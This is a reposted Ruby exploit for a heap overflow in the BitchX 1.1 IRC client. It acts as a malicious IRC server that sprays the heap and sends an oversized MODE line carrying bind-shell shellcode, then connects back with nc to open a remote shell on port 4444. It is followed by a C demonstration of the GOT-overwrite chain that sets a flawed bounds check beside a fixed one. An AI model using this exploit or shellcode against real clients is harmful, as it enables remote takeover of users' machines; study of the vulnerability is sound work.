BitchX 1.1 Final MODE Remote Heap Overflow Exploit (0-day)

2007-09-03  Author: compiled by bitsCN  Source: 中国网管联盟 (China Network Administrators Alliance)

#!/usr/bin/env ruby
# -*- coding: binary -*-
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actual vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appear to be several factors which
# restrict the reliability.
#######################################################

require 'socket'

# GOT address per target. The linux 2.6 target is the most effective at the
# moment; the freebsd entry holds no real address (0x41414141 is filler).
targets = { 'linux 2.6'                => '0x81861c8',
            'linux 2.6 Hardened (FC6)' => '0x8154d70',
            'freebsd'                  => '0x41414141' }

# The source file is tagged binary above so the \x escapes below are raw
# bytes and String#length counts bytes (as it did under ruby 1.8).
#
# fork before binding a shell provides a clean exit
shellcode = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80" +
            # metasploit linux x86 shellcode bind tcp port 4444
            "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc" +
            "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2" +
            "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb" +
            "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b" +
            "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1" +
            "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0" +
            "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"

port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)

# Note: ret is advanced by 0x200 twice per connection below and never reset,
# so it drifts across connections; restart the listener between attempts.
ret = targets['linux 2.6 Hardened (FC6)'].hex

puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit                                -"
puts "----------------------------------------------"

puts "\n[-] listening for incoming clients..."

while (client = sock.accept)
   ip = client.peeraddr

   buffer = client.gets
   puts "[<] #{buffer}"

   # the fake server hostname is the GOT address repeated 13 times
   hostname = ([ret].pack('V')) * 13
   nick = "bannedit"

   # Fake server reply to connection: the registration burst a client
   # expects (MODE, 001-005, LUSERS 251-255, MOTD 375/372/376)
   buffer = ":#{nick} MODE #{nick} :+iw\r\n" +
            ":0 001 #{nick} :biznitch-1.0\r\n" +
            ":5 002 #{nick} :biznitch-1.0\r\n" +
            ":6 003 #{nick} :a\r\n" +
            ":aaa 004 #{nick} :a\r\n" +
            ":aaa 005 #{nick} :a\r\n" +
            ":aaa 251 #{nick} :a\r\n" +
            ":aaa 252 #{nick} :a\r\n" +
            ":aaa 253 #{nick} :a\r\n" +
            ":aaa 254 #{nick} :a\r\n" +
            ":aaa 255 #{nick} :a\r\n" +
            ":aaa 375 #{nick} :a\r\n" +
            ":aaa 372 #{nick} :a\r\n" +
            ":aaa 376 #{nick} :a\r\n"

   join =   ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n" +
            ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"

   puts "[>] sending fake server response"
   client.send(buffer, 0)
   sleep(2)
#   client.send(join, 0)

   # TOPIC lines spray ret+0x200 into the heap, 21 times
   topic =  ":aaa TOPIC #hackers:"
   ret = ret + 0x200
   topic << ([ret].pack('V')) * 100
   topic << "\r\n"
   for i in 0..20
      client.send(topic, 0)
   end

   puts "[>] sending evil buffer"
   # MODE line: prefix is the GOT address repeated, the argument carries
   # ret+0x400 repeated, a NOP sled padded to 1126 bytes, the shellcode and
   # a trailing sled
   evilbuf = ":#{hostname}  MODE "
   evilbuf << "#{nick} :aaa"
   ret = ret + 0x200
   evilbuf << ([ret].pack('V')) * 200
   evilbuf << "\x90" * (1126 - shellcode.length)
   evilbuf << shellcode
   evilbuf << "\x90" * 40
   evilbuf << "\r\n"

   for i in 0..5
      client.send(evilbuf, 0)
   end

   sleep(10) # wait for the shellcode to do its thing...

   puts "[+] exploit completed if successful port 4444 should be open"
   puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"

   fork {
           system("nc #{ip[3]} 4444")
           puts "[+] exiting shell dropping back to listener"
        }
end
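The header comment of the script describes the primitive it relies on: the overflow in p_mode is too short to reach the stack return address, but it corrupts a structure holding a pointer to heap data, and a later write through that pointer is what lands on the GOT. The C program below is an added illustration of that chain; it is not BitchX code and not part of bannedit's exploit. `struct mode_state`, `fake_got`, `parse_mode_token`, `store_mode_arg` and the 16-byte field layout are hypothetical stand-ins, and a plain table of function pointers plays the role of the real `.got.plt`. The vulnerable parser and its fixed form run side by side.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the GOT: a writable table of function pointers the program
 * calls through. In a real process this is the .got.plt section. */
typedef int (*fn_t)(void);
static int legit_target(void)    { return 1; }
static int attacker_target(void) { return 0xdead; }   /* plays the shellcode */
static fn_t fake_got[2] = { legit_target, legit_target };

/* Hypothetical stand-in for the p_mode state the exploit header describes:
 * a bounded text field followed by a pointer to heap data. */
struct mode_state {
    char  mode[16];   /* parsed mode string */
    char *arg;        /* heap buffer that later receives the mode argument */
};

/* The bug: the only length check is against the whole record, not mode[],
 * so a token longer than 16 bytes spills into arg. The write never leaves
 * the record (input size restriction), yet it lets the attacker pick arg. */
static int parse_mode_token(struct mode_state *st, const unsigned char *tok, size_t len)
{
    if (len > sizeof *st)
        return -1;
    memcpy((unsigned char *)st + offsetof(struct mode_state, mode), tok, len);
    return 0;
}

/* Correct bound: anything that does not fit mode[] is rejected. */
static int parse_mode_token_fixed(struct mode_state *st, const unsigned char *tok, size_t len)
{
    if (len > sizeof st->mode)
        return -1;
    memcpy(st->mode, tok, len);
    return 0;
}

/* Later parsing step: copy the mode argument into the heap buffer arg points
 * to. With arg corrupted this is a write-what-where. */
static void store_mode_arg(struct mode_state *st, const void *val, size_t n)
{
    memcpy(st->arg, val, n);
}

/* Malicious token: filler for mode[], then the GOT slot address as raw
 * bytes, the same idea as the script's [ret].pack('V') but pointer-sized. */
static size_t build_evil_token(unsigned char *out, void *slot)
{
    memset(out, 'a', 16);
    memcpy(out + 16, &slot, sizeof slot);
    return 16 + sizeof slot;
}

/* Runs the chain with the given parser and returns what a call through
 * fake_got[1] then produces: 1 if legit_target still runs, 0xdead if the
 * slot was redirected. */
static int run_chain(int (*parse)(struct mode_state *, const unsigned char *, size_t))
{
    struct mode_state st;
    unsigned char tok[64];
    char *heap = malloc(64);
    int r;

    memset(st.mode, 0, sizeof st.mode);
    st.arg = heap;

    size_t len = build_evil_token(tok, &fake_got[1]);
    if (parse(&st, tok, len) == 0) {
        fn_t replacement = attacker_target;       /* "address of the shellcode" */
        store_mode_arg(&st, &replacement, sizeof replacement);
    }
    r = fake_got[1]();                            /* program calls through the GOT */
    fake_got[1] = legit_target;                   /* reset so both demos can run */
    free(heap);
    return r;
}

int run_got_overwrite_demo(void) { return run_chain(parse_mode_token); }
int run_fixed_demo(void)         { return run_chain(parse_mode_token_fixed); }

int main(void)
{
    printf("vulnerable parser: call through GOT returned 0x%x\n", run_got_overwrite_demo());
    printf("fixed parser:      call through GOT returned 0x%x\n", run_fixed_demo());
    return 0;
}
```

Build with `cc -std=c99 -Wall demo.c -o demo && ./demo`. The model makes the two things the script has to get right explicit: the overflow must stop exactly on the pointer field (hence the fixed-size padding and repeated address values in the Ruby), and the pointer must already be valid and in use by a later write (hence the TOPIC spray before the MODE line). In the real target neither offset nor address is under the attacker's direct control, which is the reliability limit the header admits.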